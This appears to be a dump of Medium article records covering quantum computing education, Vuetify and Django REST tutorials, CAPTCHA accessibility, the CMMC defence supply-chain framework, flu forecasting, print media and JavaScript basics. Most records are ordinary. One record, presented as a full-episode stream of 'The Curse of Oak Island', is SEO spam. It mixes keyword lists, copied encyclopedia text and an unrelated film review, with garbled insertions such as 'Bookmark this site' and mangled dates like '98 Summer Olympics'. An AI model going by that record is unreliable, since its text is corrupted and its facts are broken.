I suppose, at this point, the current reader is wondering what the current writer’s grand plan is for solving the world’s current quantum education and literacy problems. I’m glad you asked, as it is innovation myself and other colleagues worldwide are in the midst of creating. For me, it all starts with a change in perspective. When I look into the not-too-distant future, I see quantum software developers who have never heard of the words “superposition” and “entanglement” (much like someone writing code today for the next food delivery app doesn’t use the words “transistor” or “NAND gate”). So with that future quantum software developer in mind, I ask myself what their quantum education looks like and, more importantly, how do we get there from here? (No, not wormholes or flux capacitors.)
I would be remiss to exclude the pun of quantum baby steps. But there are also leaps. Quantum Computing for Babies and Quantum Leaps were an attempt to bring quantum computing to ever-younger audiences.
Others have brought new innovations for introducing quantum computing to general adult audiences. For example, Andy Matuschak and Michael Nielsen have created Quantum Country, which is best described as an introductory textbook with interspersed questions that will automatically be reasked based on how often you answer them correctly (spaced repetition for the cognitive science aficionados).
The first set of quiz cards in Quantum Country.
Brilliant — an app that teaches topics through active problem solving — has a Quantum Computing course. Note that it requires a premium membership to fully enjoy.
BLACK OPAL is an app from Q-CTRL that is currently in private beta which includes highly interactive exercises for learning quantum computing.
In-app with BLACK OPAL courtesy of Q-CTRL.
Quantum Atlas is a multimedia encyclopedia hosted at the Joint Quantum Institute, which is maintained by a large National Science Foundation-funded group of scientists and science journalists.
Seemingly orthogonal to all of that is quantum games, many of which are designed for the purpose of teaching quantum computing. The best-produced example is the somewhat unimaginatively named Quantum Game.
Demo screen from Quantum Game.
Speaking of games, I recently wrote about how I’ve changed the way I teach quantum computing to undergraduate students through game development.
I would have agreed with almost everything Aaronson said several years ago. (In fact, he and others have been saying the same thing for ten years.) But I’m kind of bored of that narrative. In fact, I would argue that quantum computing is not hard to explain. All we need is a different perspective. | https://medium.com/@csferrie/what-could-make-quantum-computing-easy-to-explain-647599468c4c | ['Chris Ferrie'] | 2021-08-06 05:44:40.074000+00:00 | ['Computer Science', 'Education', 'Quantum Computing', 'Technology', 'Quantum'] |
165 | The Curse of Oak Island < (Season 8 :: Episode 6) > “Full/Episode” | The Curse of Oak Island Streaming Francais P E L I C U L A : Originally, A mystery story that focuses on homicides. Usually, the detective must figure out who killed one or several victims. They could or may not find themselves or loved ones in peril as a result of this investigation. The genre often includes factors of the suspense story genre, or of the action and adventure genres.
The Curse of Oak Island
The Curse of Oak Island 8x6
The Curse of Oak Island S8E6
The Curse of Oak Island Cast
The Curse of Oak Island x The Curse of Oak Island
The Curse of Oak Island History
The Curse of Oak Island Eps. 6
The Curse of Oak Island Season 8
The Curse of Oak Island Episode 6
The Curse of Oak Island Premiere
The Curse of Oak Island New Season
The Curse of Oak Island Full Episodes
The Curse of Oak Island Watch Online
The Curse of Oak Island Season 8 Episode 6
Watch The Curse of Oak Island Season 8 Episode 6 Online
✨The discovery of an expanding stone roadway under the muck of the swamp sends the team out to sea to investigate exactly how far it reaches.
✌ STREAMING MEDIA ✌
Streaming media is multimedia that is constantly received by and presented to an end-user while being delivered by a provider. The verb to stream refers to the procedure of delivering or obtaining media this way.[clarification needed] Streaming identifies the delivery approach to the medium, rather than the medium itself. Distinguishing delivery method from the media distributed applies especially to telecommunications networks, as almost all of the delivery systems are either inherently streaming (e.g. radio, television, streaming apps) or inherently non-streaming (e.g. books, video cassettes, audio tracks CDs). There are challenges with streaming content on the web. For instance, users whose Internet connection lacks sufficient bandwidth may experience stops, lags, or slow buffering of this content. And users lacking compatible hardware or software systems may be unable to stream certain content.
Streaming is an alternative to file downloading, an activity in which the end-user obtains the entire file for the content before watching or listening to it. Through streaming, an end-user may use their media player to get started on playing digital video or digital sound content before the complete file has been transmitted. The term “streaming media” can connect with media other than video and audio, such as for example live closed captioning, ticker tape, and real-time text, which are considered “streaming text”.
This brings me around to discussing us, a film release of the Christian religio us faith-based . As almost customary, Hollywood usually generates two (maybe three) films of this variety movies within their yearly theatrical release lineup, with the releases usually being around spring us and / or fall respectfully. I didn’t hear much when this movie was initially aounced (probably got buried underneath all of the popular movies news on the newsfeed). My first actual glimpse of the movie was when the film’s movie trailer premiered, which looked somewhat interesting if you ask me. Yes, it looked the movie was goa be the typical “faith-based” vibe, but it was going to be directed by the Erwin Brothers, who directed I COULD Only Imagine (a film that I did so like). Plus, the trailer for I Still Believe premiered for quite some us, so I continued seeing it most of us when I visited my local cinema. You can sort of say that it was a bit “engrained in my brain”. Thus, I was a lttle bit keen on seeing it. Fortunately, I was able to see it before the COVID-9 outbreak closed the movie theaters down (saw it during its opening night), but, because of work scheduling, I haven’t had the us to do my review for it…. as yet. And what did I think of it? Well, it was pretty “meh”. While its heart is certainly in the proper place and quite sincere, us is a little too preachy and unbalanced within its narrative execution and character developments. The religious message is plainly there, but takes way too many detours and not focusing on certain aspects that weigh the feature’s presentation.
✌ TELEVISION SHOW AND HISTORY ✌
A tv set show (often simply Television show) is any content prBookmark this siteoduced for broadcast via over-the-air, satellite, cable, or internet and typically viewed on a television set set, excluding breaking news, advertisements, or trailers that are usually placed between shows. Tv shows are most often scheduled well ahead of The War with Grandpa and appearance on electronic guides or other TV listings.
A television show may also be called a tv set program (British EnBookmark this siteglish: programme), especially if it lacks a narrative structure. A tv set Movies is The War with Grandpaually released in episodes that follow a narrative, and so are The War with Grandpaually split into seasons (The War with Grandpa and Canada) or Movies (UK) — yearly or semiaual sets of new episodes. A show with a restricted number of episodes could be called a miniMBookmark this siteovies, serial, or limited Movies. A one-The War with Grandpa show may be called a “special”. A television film (“made-for-TV movie” or “televisioBookmark this siten movie”) is a film that is initially broadcast on television set rather than released in theaters or direct-to-video.
Television shows may very well be Bookmark this sitehey are broadcast in real The War with Grandpa (live), be recorded on home video or an electronic video recorder for later viewing, or be looked at on demand via a set-top box or streameBookmark this sited on the internet.
The first television set shows were experimental, sporadic broadcasts viewable only within an extremely short range from the broadcast tower starting in the. Televised events such as the 98 Summer OlyBookmark this sitempics in Germany, the 986 coronation of King George VI in the UK, and David Sarnoff’s famoThe War with Grandpa introduction at the 9 New York World’s Fair in the The War with Grandpa spurreBookmark this sited a rise in the medium, but World War II put a halt to development until after the war. The 986 World Movies inspired many Americans to buy their first tv set and in 98, the favorite radio show Texaco Star Theater made the move and became the first weekly televised variety show, earning host Milton Berle the name “Mr Television” and demonstrating that the medium was a well balanced, modern form of entertainment which could attract advertisers. The firsBookmBookmark this siteark this sitet national live tv broadcast in the The War with Grandpa took place on September 6, 98 when President Harry Truman’s speech at the Japanese Peace Treaty Conference in SAN FRAThe Curse of Oak Island CO BAY AREA was transmitted over AT&T’s transcontinental cable and microwave radio relay system to broadcast stations in local markets.
✌ FINAL THOUGHTS ✌
The power of faith, love, and affinity for take center stage in Jeremy Camp’s life story in the movie I Still Believe. Directors Andrew and Jon Erwin (the Erwin Brothers) examine the life span and The War with Grandpas of Jeremy Camp’s life story; pin-pointing his early life along with his relationship Melissa Heing because they battle hardships and their enduring love for one another through difficult. While the movie’s intent and thematic message of a person’s faith through troublen is indeed palpable plus the likeable mThe War with Grandpaical performances, the film certainly strules to look for a cinematic footing in its execution, including a sluish pace, fragmented pieces, predicable plot beats, too preachy / cheesy dialogue moments, over utilized religion overtones, and mismanagement of many of its secondary /supporting characters. If you ask me, this movie was somewhere between okay and “meh”. It had been definitely a Christian faith-based movie endeavor Bookmark this web site (from begin to finish) and definitely had its moments, nonetheless it failed to resonate with me; struling to locate a proper balance in its undertaking. Personally, regardless of the story, it could’ve been better. My recommendation for this movie is an “iffy choice” at best as some should (nothing wrong with that), while others will not and dismiss it altogether. Whatever your stance on religion faith-based flicks, stands as more of a cautionary tale of sorts; demonstrating how a poignant and heartfelt story of real-life drama could be problematic when translating it to a cinematic endeavor. For me personally, I believe in Jeremy Camp’s story / message, but not so much the feature. | https://medium.com/s8-e6-the-curse-of-oak-island-history/s8-e6-the-curse-of-oak-island-series-8-episode-6-full-eps-7b7344487e11 | ['Lia Nuraliah'] | 2020-12-14 11:02:48.943000+00:00 | ['Politics', 'Documentary', 'Technology', 'Life'] |
166 | DYZRUPT ANNOUNCES THE APPOINTMENT OF AMB. | DYZRUPT LIMITED
DYZRUPT ANNOUNCES THE APPOINTMENT OF AMB. KWAME A.A OPOKU AS DIRECTOR OF COMMUNICATIONS TO LEAD THE NEXT PHASE OF DYZRUPT LTD.
It has been over a year since Dyzrupt LTD was born. The company is positioned to become one of Africa’s, if not one of the world’s, most disruptive technological start-ups of this generation. Dyzrupt’s objective is to foster wealth creation for Africans and others through creative, unconventional approaches that help address local challenges.
The company had a soft launch on September 01, 2019, and its core team and designers have since been working hard behind the scenes, creating a series of arguably some of the most captivating and far-reaching Blockchain-based innovations of this decade.
KWAME A.A OPOKU
As a strategic addition to its core team, the company is bringing a trail blazer and high-achiever, who is an award-winning futurist, Global Business Keynote Speaker, Brand Architect, Entrepreneur, and Social Media/Digital Marketer; Mr. Kwame A. A. Opoku will officially join Dyzrupt as the Director of Communications effective December 01, 2020.
Mr. Opoku is the current CEO of the Reset Global People, which runs successful flagship initiatives, such as Women Entrepreneurship Festival, the African Women CEOs Summit, and Top 100 Women CEOs in Africa; the Vice Chair of West Africa for the Young CEOs Business Forum, which oversees operations in 16 Countries; and is also the founder of the Ghana AI & Blockchain Forum and Co-Founder of the Digital CEO Summit, which runs in 8 African countries.
The company has an ambitious marketing campaign to bring Dyzrupt products and services to a large segment of the more than 1 billion Africans living on the continent. Kwame will summon his expertise and rich international experience to help make Dyzrupt a household name in Africa.
We are Dyzrupt. Liberating Africans. Changing Lives. | https://medium.com/@dyzrupt/dyzrupt-announces-the-appointment-of-amb-cd28555080cf | ['Dyzrupt Ltd'] | 2020-11-24 10:06:02.434000+00:00 | ['Blockchain', 'Blockchain Technology', 'Cryptocurrency', 'Cryptocurrency News', 'Blockchain Startup'] |
167 | Vuetify — Time Pickers. Vuetify comes with a time picker. | Photo by Icons8 Team on Unsplash
Vuetify is a popular UI framework for Vue apps.
In this article, we’ll look at how to work with the Vuetify framework.
Time Pickers
We can add a time picker with the v-time-picker component.
For example, we can use it by writing:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1"></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
We add the v-time-picker component to add the time picker.
The color prop sets the color of the heading.
v-model has the time value that’s picked.
Disabled
We can disable a date picker with the disabled prop:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1" disabled></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
Now we can’t pick a date.
Read-only
We can make the time picker be read-only with the readonly prop:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1" readonly></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
We won’t see any style differences from the regular time picker, but we can’t choose a time with it.
24h Format
The format prop lets us change the format of the time.
To change it to 24h format, we write:
<template>
<v-row justify="space-around">
<v-time-picker v-model="time" color="green lighten-1" format="24hr"></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: undefined,
}),
};
</script>
Allowed Times
The time that can be picked can be restricted with the allowed-hours and allowed-minutes props:
<template>
<v-row justify="space-around">
<v-time-picker
v-model="time"
:allowed-hours="allowedHours"
:allowed-minutes="allowedMinutes"
class="mt-4"
format="24hr"
scrollable
min="9:30"
max="22:15"
></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: "11:15",
}),
methods: {
allowedHours: (v) => v % 2,
allowedMinutes: (v) => v >= 10 && v <= 50,
},
};
</script>
We have the allowed-hours prop set to the allowedHours function.
It lets us return the condition for the hours that users can pick.
We can have similar functions for minutes and the step.
The v parameter has the hours and minutes.
For example, we can write:
<template>
<v-row justify="space-around">
<v-time-picker v-model="timeStep" :allowed-minutes="allowedStep" class="mt-4" format="24hr"></v-time-picker>
</v-row>
</template>
<script>
export default {
name: "HelloWorld",
data: () => ({
time: "11:15",
timeStep: "10:10",
}),
methods: {
allowedStep: (m) => m % 10 === 0,
},
};
</script>
We have the allowedStep function, which we use as the value of the allowed-minutes prop.
m has the minutes.
Conclusion
We can add a time picker with various restrictions set on it.
Its color can also be changed. | https://medium.com/dev-genius/vuetify-time-pickers-e111e1091618 | ['John Au-Yeung'] | 2020-12-27 18:35:45.693000+00:00 | ['Programming', 'Web Development', 'Technology', 'Software Development', 'JavaScript'] |
168 | AI is making CAPTCHA increasingly cruel for disabled users | Written by Robin Christopherson MBE, Head of Digital Inclusion at AbilityNet
A CAPTCHA, (an acronym for “completely automated public Turing test to tell computers and humans apart”), is a test used in computing to determine whether or not the user is human. You’ve all seen those distorted codes or image-selection challenges that you need to pass to sign up for a site or buy that bargain. Well, improvements in AI means that a crisis is coming … and disabled people are suffering the most.
CAPTCHAs are evil
Whatever the test — whether it’s a distorted code, having to pick the odd-one-out from a series of images, or listen to a garbled recording — CAPTCHAs have always been evil and they’re getting worse. The reason is explained in an excellent recent article from The Verge; Why CAPTCHAs have gotten so difficult. Increasingly smart artificial intelligence (AI) is the reason why these challenges are becoming tougher and tougher. As the ability of machine learning algorithms to recognise text, objects within images, the answers to random questions or a garbled spoken phrase improve month on month, the challenges must become ever-more difficult for humans to crack.
Jason Polakis, a computer science professor at the University of Illinois at Chicago, claims partial responsibility. In 2016 he published a paper showing that Google’s own image and speech recognition tools could be used to crack their own CAPTCHA challenges. “Machine learning is now about as good as humans at basic text, image, and voice recognition tasks,” Polakis says. In fact, algorithms are probably better at it: “We’re at a point where making it harder for software ends up making it too hard for many people. We need some alternative, but there’s not a concrete plan yet.”
We’ve all seen the ‘I am not a robot’ checkboxes that use clever algorythms to decide if the user’s behaviour navigating the website is random enough to be a human. These used to work well — letting us through with that simple checking of the box — but increasingly the bots are able to mimic a human’s mouse or keyboard use and we get the same old challenge of a selection of images popping up as an additional test of our humanity.
The Verge article quite rightly bemoans the place we’ve arrived at — highlighting how difficult these ever-more-obscure challenges are for people with normal levels of vision, hearing and cognitive abilities. We just can’t compete with the robots at this game.
Don’t forget the disabled — we’re people too
But what about all those people who don’t have ‘normal’ abilities? People with a vision or hearing impairment or a learning disability are well and truly thwarted when it comes to CAPTCHAs that test the vast majority of humans to the very limit and beyond. After reading the article, I came away feeling that this very significant group (a fifth of the population and rising) deserve a mention at the very least — after all, they’ve been suffering in the face of these challenges far, far longer than those who do not have a disability or dyslexia (and have been locked out of many an online service as a result).
At the very heart of inclusive design is the ability to translate content from one format into another. For example, if a blind person can’t see text on-screen, it should allow the ability to be converted into speech (that’s how I’m writing this article). If someone can’t easily read a certain text size or font style or in certain colours, then it should allow for resizing or the changing of fonts and colours — this is all basic stuff that most websites accommodate quite well. Images should be clear and their subject easy to understand — and they should include a text description for those who can’t see it at all. Audio should be clear. All aspects of ‘Web Accessibility 101’.
The whole point of CAPTCHA challenges is to allow for none of these. No part of the challenge can be machine-readable or the bots will get in. Text can’t be plain text that can be spoken out by a screenreader for the blind — it has to be pictures of characters so excruciatingly garbled that no text-recognition software can crack it. Ditto with an audio challenge. Pictorial challenges must be so obscure that object recognition software can’t spot the distant traffic lights amongst the foliage etc, etc. It has ever been thus.
Today the road signs need to be obscured by leaves because the bots are better than ever at recognising them — but five years ago the images were still chosen to be just complex enough so as to thwart the bots of the day. And because the bots are using the same machine-learning AI as the assistive software used by disabled people to convert content into a form that is understandable to them, they were locked out too.
Did I mention? — CAPTCHAs are evil
So long as websites want to keep the bots from registering spam accounts or posting bogus comments, there will need to be some way for developers to detect and deflect their attempts. The use of CAPTCHA challenges, however, is not and has never been a fair (or even legal) one. It discriminates and disenfranchises millions of users every day.
So, whilst the article neglects to mention the significant segment of users most egregiously affected by CAPTCHAs, I’m hopeful that its main message — namely that this arms-race is rapidly reaching a point where the bots consistently beat humans at their own game — is a herald of better times to come.
As CAPTCHAs actually begin to capture the humans and let the bots in, then they begin to serve the opposite objective to that intended. They should then disappear faster than a disillusioned disabled customer with money to spend but wholly unable to access your services.
So what’s the alternative?
Companies like Google, who have long provided commonly-used CAPTCHA services, have been working hard on a next-generation approach that combines a broader analysis of user behaviour on a website. Called reCAPTCHA v3, it is likely to use a mix of cookies, browser attributes, traffic patterns, and other factors to evaluate ‘normal’ human behaviour — although Google are understandably being cagey about the details.
So hopefully by now you get the bigger picture. Hopefully you’re saying to yourself, “Ah, but will the clever analysis cater for users who aren’t so average or will they once again be excluded by not being ‘normal’ enough?” Excellent question — I’m glad you’re on your game and on-board.
For example, will I, as a blind keyboard-only user of a website, be flagged as a bot and banished? Will a similar fate befall switch users (like the late and much missed Prof Stephen Hawking) who use certain software settings to methodically scan through a page. Dragon users issue voice commands that instantly move the mouse from one position to another in a very non-human way. I could go on.
I hope you get the picture. Moreover, I hope that Google and other clever types working on the issue elsewhere get the picture too. They certainly haven’t to date.
Originally posted here
More thought leadership | https://medium.com/digital-leaders-uk/ai-is-making-captcha-increasingly-cruel-for-disabled-users-1c0c994934ef | ['Digital Leaders'] | 2019-02-22 16:01:23.231000+00:00 | ['Artificial Intelligence', 'Online', 'Technology', 'Captcha', 'Accessibility'] |
169 | Web Development in Python: Django Rest Framework: Serialization, Requests, and Response | Add Django Rest Framework
Install Django Rest Framework:
pip install djangorestframework
Add then add rest_framework in INSTALLED_APPS array:
INSTALLED_APPS = [ ... 'home', 'rest_framework' ]
Add Models
Run the following command to make the migrations:
python3 manage.py migrate
python3 manage.py makemigrations
You can learn more about models here.
Serialization
In DRF, serializers are responsible for converting complex data such as querysets and model instances to native Python datatypes ( called serialization ) that can be easily rendered into JSON, XML, or other content types which can be rendered by front-end.
Serializers are also responsible for deserialization which means it allows parsed data to be converted back into complex types, after first validating the incoming data.
Serializer Class
A serializer class is very similar to Django Forms and ModelForm class and includes similar validation flags on the various fields, such as required, max_length, default, etc.
We have our database with 3 fields ( topic, author, body ). However, we need to make some adjustment in order for us to take data from the user, store in the database, convert it into JSON, and send it back to front-end. In technical terms, the complex data type (in form of model instance ) first converted into Python Native Data Type, and later this convert to JSON data.
Add serializers.py
line 1: we are importing the serializers module from rest_framework.
line 2: we are creating a class name PostSerializers, which is inheriting from the Serializer class inside of the serializers module.
line 3,4,5: if you ever made forms in Django, you would see this is very similar to forms. We are creating the instances of the same fields as in our models.py file.
Add views.py
line 1: Importing the render method.
line 2: importing Post model from models.py file
line 3: importing PostSerializers
line 4: Importing JSONRender so we can convert the data to JSON type.
line 5: importing the HttpResponse just to display the output.
line 8: creating a functional view, which takes request as an argument.
line 9: new_post variable stores the object with id = 1 only.
line 10: we are serializing the new_post variable and storing that object in the serializer variable.
line 11: json_data variable storing the data as JSON, the JSONRenderer renders the request data into JSON.
line 12: it returns the value of the function as an HttpResponse in the form of JSON
we can add a few lines in our detailed function (post_detail.py) to show what is going on behind the scene.
you can check in your terminal, you will see some details of what these variables (new_post, serializer,json_data ) prints. It will be fun!!
Add urls.py
just add the endpoint for views we have created in the ecom/ursl.py file.
Add data to your table by going to http://127.0.0.1:8000/admin/home/post/ and click on the ADD POST button. | https://medium.com/python-in-plain-english/web-development-in-python-django-rest-framework-serialization-requests-and-response-88a5bf6a5752 | ['Saranjeet Singh'] | 2020-11-19 16:13:21.529000+00:00 | ['Coding', 'Programming', 'Python', 'Web Development', 'Technology'] |
170 | Now, More Than Ever: Supply Chain Security — Unpacking The CMMC With Katie Arrington And Yolanda Craig | It should be evident by now that Information security should be a core value to any organization — and even more so for those that interact with government entities — and furthermore for those that operate within the government defense space.
It’s easy to say. But even for those that want to honestly act on this objective, how can they make “this” actually happen?
Good question indeed. This is precisely the one we are going to try to answer in this podcast.
Organizations can meet the letter of the law, or regulation, or standard. Checkbox process — done.
They can bring it to the front of the process and perform a risk assessment. Scenario documentation — done.
But what about the middle bit where a lot of the critical thinking takes place and where the controls get defined; where the organization not only claims they “take security seriously” but can also prove it?
How does an organization bridge this gap in a way that actually addresses the risk throughout the government’s entire supply chain?
This is where the Cybersecurity Maturity Model Certification (CMMC) comes into play. And looking at the most recent events, evidently, not a moment too soon.
Now it is the time to go ahead and learn what the CMMC is.
From the CMMC site:
The Office of the Under Secretary of Defense for Acquisition and Sustainment (OUSD(A&S)) recognizes that security is foundational to acquisition and should not be traded along with cost, schedule, and performance moving forward. The Department is committed to working with the Defense Industrial Base (DIB) sector to enhance the protection of controlled unclassified information (CUI) within the supply chain.
OUSD(A&S), working with DoD stakeholders, University Affiliated Research Centers (UARCs), Federally Funded Research and Development Centers (FFRDC), and industry, developed the Cybersecurity Maturity Model Certification (CMMC) framework.
The CMMC will review and combine various cybersecurity standards and best practices and map these controls and processes across several maturity levels that range from basic cyber hygiene to advanced. For a given CMMC level, the associated controls and processes, when implemented, will reduce risk against a specific set of cyber threats.
The CMMC effort builds upon existing regulation (DFARS 252.204–7012) that is based on trust by adding a verification component with respect to cybersecurity requirements.
The goal is for CMMC to be cost-effective and affordable for small businesses to implement at the lower CMMC levels.
Authorized and accredited CMMC Third Party Assessment Organizations (C3PAOs) will conduct assessments and issue CMMC certificates to Defense Industrial Base (DIB) companies at the appropriate level.
This text above provides a decent overview. But you likely have some questions. If you want to learn more about CMMC, DFARS, C3PAOs, and DIB; and, if you want to hear how CMMC and NIST connect together; and, if you want to hear how the CMMC can be leveraged to improve (and demonstrate) your organization’s cybersecurity posture, then this episode is for you.
I had the distinct honor of bringing together two industry leaders that know the CMMC inside and out: Katie Arrington, CISO A&S at United States Department of Defense responsible for bringing the CMMC to light; and Yolanda Craig, a former manager of Cyber Information Technology) at the US DoD and now helping government contractors be cyber-ready.
This happens to be a very timely discussion given the recent cyber revelations for the American government supply chain. I would encourage EVERY organization (not just those supplying the government with products and services) to listen to this episode.
Now, more than ever, we need supply chain security. Now, more than ever, knowledge is power. Grab some here and share with far and wide.
Guest(s)
Katie Arrington, CISO A&S at United States Department of Defense
Yolanda Craig, VP, Cyber Strategy, Everwatch Solutions | Former Manager (Cyber Information Technology), US DoD
This Episode’s Sponsors:
Nintex: https://itspm.ag/itspntweb
Imperva: https://itspm.ag/imperva277117988
RSA Security: https://itspm.ag/itsprsaweb
Resources
CMMC: https://www.acq.osd.mil/cmmc/index.html
CMMC Accreditation Body: https://www.cmmcab.org/
CMMC Assessment Guide: https://www.acq.osd.mil/cmmc/draft.html
To see and hear more Redefining Security content on ITSPmagazine, visit:
https://www.itspmagazine.com/redefining-security
Are you interested in sponsoring an ITSPmagazine Channel?
https://www.itspmagazine.com/podcast-series-sponsorships | https://medium.com/itspmagazine/now-more-than-ever-supply-chain-security-unpacking-the-cmmc-with-katie-arrington-and-yolanda-37c3547fb295 | ['Itspmagazine Podcast'] | 2020-12-21 15:57:02.838000+00:00 | ['Government', 'Hacking', 'Supply Chain', 'Cybersecurity', 'Technology'] |
171 | Are Learning Apps Helping Or Hurting Education For Children? | Our formative years build the basis on which our success in life will be determined. These formative years also provide us with basic life skills such as reading, writing, calculating, and communicating effectively. Every parent needs to ensure that their child gets the best education possible during this period to ensure that they succeed in life.
However, with the world turning to tech for almost everything and tablets, smartphones, and digital learning aids on the rise for children as young as 5, should parents be concerned about enhanced screen time and its impact on learning? Let’s find out.
Learning methodologies in children
Children learn in many different ways. These learnings are visual, auditory, or sensory. Children also learn at their own pace, regardless of the pace their class is going at. Digital devices take advantage of this and offer learners the capability to learn at their own pace and not try to match the rate of instruction of their teacher. This also encourages little children to understand self-learning better. Children with disabilities such as dyslexia and autism can be helped by apps to develop social skills and make progress at their own pace without public scrutiny or being subjected to ridicule or judgment.
To know more about the impact of selflearning for very young children, advantages and disadvantages of using apps in education | https://medium.com/@harshit-31039/are-learning-apps-helping-or-hurting-education-for-children-5ec334b646e2 | ['Harshit Shukla'] | 2020-12-18 10:28:50.535000+00:00 | ['Education Technology', 'Mobile Apps', 'Education', 'Mobile App Development', 'Education Reform'] |
172 | Print or Digital Media — The Battle is Far From Over | The digital transformation has radically altered the publishing industry. Many people believe that the emergence of eBooks, audiobooks, and online news marks the impending death of the printed word. But is print media truly on its way to becoming a museum piece or will it prove to be resilient in the face of the digital era?
Virtually everyone agrees that the digital transformation of the media industry is already well underway. Consumer behavior and expectations are driving this change, and younger generations in particular are accustomed to instant access to global content at all times. The rapid rise of mobile and other technologies has reshaped the manner in which the world creates and consumes information, and this change is profoundly affecting the media sector. The relative affordability of mobile technology is another catalyst for the digital transformation, as it allows a growing number of consumers to utilize the latest tools in their quest to enjoy content.
The Impact of Digital Transformation in the Media and Entertainment Sector report, produced by Econsultancy in partnership with Adobe, notes that an incredible 97% of media companies surveyed believe that the digital transformation has disrupted their sector. At the same time, only 44% see themselves as being part of the disruption and helping to lead the way to a new approach. To close this gap, we recommend that instead of viewing digitalization as a threat, media enterprises should integrate their content into high-quality user experiences, including customized content, more relevant and personalized advertisements, and other innovative methods to successfully compete in the modern ecosystem.
While there’s no question that the digital transformation has permanently changed the media industry, reports of the death of print have been greatly exaggerated. The reality is that the tangible nature of physical media remains important to a large percentage of consumers.
Books
According to a 2016 Pew Research Center survey, 65% of Americans have read a print book in the last 12 months, which is more than double the 28% share who had read an e-book in the same period, and more than four times the 14% who had listened to an audiobook. Clearly, printed books are alive and well.
Magazines
The numbers show that physical copies are still an essential part of the magazine landscape, with the top U.S. magazine, AARP The Magazine, having a circulation of over 23 million. And some luxury publishers, such as Monocle, Hodinkee, and Goop, have recently launched new print magazine offerings, further illustrating the continued resilience of the printed word.
Newspapers
According to data collected by Scarborough, a market research company owned by Nielsen, for the 51 largest American newspapers the print edition reaches 28% of circulation areas, while the digital version only reaches 10%. Digital readers don’t stick around. Data from Pew Research Center indicates that people going directly to news websites stay for less than five minutes on average, while readers coming from Facebook leave in less than two minutes. Pew’s data shows that print-only remains the most popular way to digest news, with more than half of the people surveyed reading a printed newspaper every day.
While the digital transformation is definitely happening, print remains an integral part of our communities. However, the fact that print advertising is declining is indisputable. Newspaper ad revenues in the U.S. fell by 12% in 2016, down to $12 billion, while American magazine ad revenues dropped by 9% to $8.5 billion. Ten years ago, newspaper advertising represented $43 billion and magazine ads were at $19 billion, according to research published by Magna Global.
So, yes, the power of print has undoubtedly declined due to the proliferation of digital media and technological advancements. And while traditional print mediums still have their audience, it’s essential that they evolve to ensure a prosperous future.
How can publishers remain relevant?
Firstly, it’s important to understand and leverage data through human insights. To effectively engage an audience in the current landscape, data must be used not only to serve or optimize content but also to assist in the process of content creation. By developing innovative ways to interpret and apply this data, media companies can use their understanding of consumers to create new products that meet or exceed the expectations of today’s readership. The digital transformation cannot be ignored. Instead, media enterprises must develop a clear strategy around mobile, video, social media, analytics, and the user experience. By devising agile operating models capable of leveraging the power of digital means for syncing content generation and delivery, the media industry can continue to thrive as consumer expectations shift.
In a world where information is much more accessible but far less reliable than it used to be, the potential for print to thrive remains strong. And the human attachment to physical books, newspapers, and magazines is undeniable. At the same time, it appears clear that digital media is poised to dominate in the future, as the number of purely digital media offerings is multiplying. But always remember: technology isn’t going to kill print media. When used effectively, technology can help digital and print in different ways, allowing both to thrive as we move forward in the ever-changing landscape of the media world. | https://medium.com/the-mission/print-or-digital-media-battle-is-far-from-over-5743aae4da71 | [] | 2019-08-05 15:46:05.575000+00:00 | ['Media', 'Digital Media', 'Publishing', 'Technology', 'Books'] |
173 | Flu forecasted to be historically low as COVID-19 cases surge | Earlier this fall there was talk of a potential “twindemic” — where the coronavirus pandemic collides with the flu season. With our hospitals and healthcare system already stressed beyond their capacity, it’s not surprising health officials have been concerned with the possibility of treating severe flu cases on top of those admitted with COVID-19.
The good news: Kinsa data is predicting an abnormally mild flu season. I recently spoke with Donald McNeil, Jr. from The New York Times about Kinsa’s flu forecast and shared with him what I’m sharing here: Here we are in December with overall illness levels hovering below 1% — just last year, in comparison, illness levels were peaking at nearly 6% of the US population sick.
Overall, contagious illness is much lower this year than usual, likely due to a combination of factors:
Minimal air travel from the southern hemisphere this summer may have reduced the import of the virus to the US
Social distancing, school and workplace closures, and fewer indoor events limit the virus ability to jump between individuals
Increased mask wearing reduced the level of viral transfer between individuals
By way of example, these maps show the overall level of illness across the US on Dec. 8, 2019 and on Dec. 8, 2020.
This in no way means that we’re out of the woods and that caution isn’t still absolutely necessary. Please continue to wear a mask, practice social distancing and do what you can to avoid group events or activities. While a light flu season is a welcome piece of good news, the reality is that our system is already at a breaking point. Our families and communities depend on our adherence to these practices.
If you’re wondering what your local flu risk is, I’ve been checking Kinsa’s local health weather often for my risk score. You can see yours here.
How Kinsa calculates illness levels: Kinsa aggregates infectious illness levels in real time through our broad network of smart thermometers and the connected mobile triage app. We use this anonymous information to estimate the percentage of the population afflicted with febrile illness (most commonly cold & flu) throughout the US. External academics have validated in peer-reviewed research Kinsa’s localized illness detection and forecasting, including the flu 12–20 weeks in advance, and up to a 3-week leading indicator for COVID-19. | https://medium.com/@inder-singh/flu-forecasted-to-be-historically-low-as-covid-19-cases-surge-cba0c38cc4d7 | ['Inder Singh'] | 2020-12-13 16:15:58.357000+00:00 | ['Coronavirus', 'Health Technology', 'Public Health', 'Covid 19', 'Pandemic'] |
174 | JavaScript Basics — Simple Value Types and Operators | Photo by Dan Gold on Unsplash
JavaScript is one of the most popular programming languages in the world. To use it effectively, we’ve to know about the basics of it.
In this article, we’ll look at the basic value types and operators.
Values
Values are the most basic types of data in a JavaScript program.
They’re stored as bits on the computer in memory.
We’ve to store values so that we can work with them later in the program.
Numbers
Numbers are the most basic data type. They store simple numeric values.
There’s no difference between floating-point and integer types.
They are all stored in one data type.
The numbers in JavaScript are 64 bit. This means that there are 64 binary digits or 2 raised to the 64th power number of numbers.
Some bits are used to store the decimal point.
This means that it’s actually 9 quadrillion numbers, position or negative.
The main thing we do with numbers are arithmetic.
We can use operators to do operations with numbers.
For instance, we can write:
1 + 3
or
2 * 3
+ and * are operators. + is for addition and * is for multiplication.
